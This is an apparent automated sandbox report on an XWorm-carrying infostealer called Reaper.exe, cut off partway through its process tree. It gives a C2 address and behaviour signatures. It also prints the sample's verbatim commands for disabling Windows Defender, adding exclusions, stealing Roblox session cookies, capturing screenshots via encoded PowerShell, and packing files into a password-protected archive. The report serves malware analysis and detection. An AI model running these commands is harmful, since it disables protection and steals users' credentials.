Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

240312-1f3f5adc57 10

10-03-2024 04:41

240310-fbmjwscd28 10

10-03-2024 04:40

240310-fan2bscc93 10

10-03-2024 04:38

240310-e9wd1scc82 10

09-03-2024 07:38

240309-jghpnsdh88 10

Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-03-2024 04:41

General

  • Target

    Reaper/Reaper/Reaper.exe

  • Size

    8.3MB

  • MD5

    79d145e3962e71bf725d15b4c0261dac

  • SHA1

    bc9d7a5a347fcefe3b3b81136e83af294bd489f4

  • SHA256

    0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d

  • SHA512

    2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df

  • SSDEEP

    196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Malware Config

Extracted

Family

xworm

C2

l838.ddns.net:3232

Attributes
  • Install_directory

    %AppData%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
    "C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3884
    • C:\Users\Admin\AppData\Local\Temp\Reaper.exe
      "C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:488
    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3492
      • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3212
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4980
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3824
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1472
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1312
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2880
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4256
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1228
          • C:\Windows\system32\tree.com
            tree /A /F
            5⤵
              PID:3388
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
                PID:4052
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4840
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                5⤵
                • Gathers system information
                PID:4452
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4896
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                5⤵
                  PID:4532
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2628
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3564
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxbb0yeb\yxbb0yeb.cmdline"
                    6⤵
                      PID:5192
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAEF.tmp" "c:\Users\Admin\AppData\Local\Temp\yxbb0yeb\CSCA82D8A325A114351ABDD62B0A0D48DB4.TMP"
                        7⤵
                          PID:5324
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    4⤵
                      PID:5532
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        5⤵
                          PID:5856
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        4⤵
                          PID:5976
                          • C:\Windows\system32\attrib.exe
                            attrib -r C:\Windows\System32\drivers\etc\hosts
                            5⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:5088
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          4⤵
                            PID:6016
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              5⤵
                                PID:3644
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                              4⤵
                                PID:5292
                                • C:\Windows\system32\attrib.exe
                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                  5⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:1356
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                4⤵
                                  PID:5368
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:5500
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    4⤵
                                      PID:4612
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist /FO LIST
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3672
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      4⤵
                                        PID:5552
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          5⤵
                                            PID:5676
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:5820
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:1088
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "getmac"
                                              4⤵
                                                PID:2600
                                                • C:\Windows\system32\getmac.exe
                                                  getmac
                                                  5⤵
                                                    PID:5980
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  4⤵
                                                    PID:3668
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5884
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    4⤵
                                                      PID:5728
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        5⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2556
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\Fftwr.zip" *"
                                                      4⤵
                                                        PID:1092
                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe
                                                          C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\Fftwr.zip" *
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4268
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                        4⤵
                                                          PID:5864
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic os get Caption
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4500
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                          4⤵
                                                            PID:2348
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic computersystem get totalphysicalmemory
                                                              5⤵
                                                                PID:3648
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              4⤵
                                                                PID:3864
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  5⤵
                                                                    PID:5860
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                  4⤵
                                                                    PID:1616
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
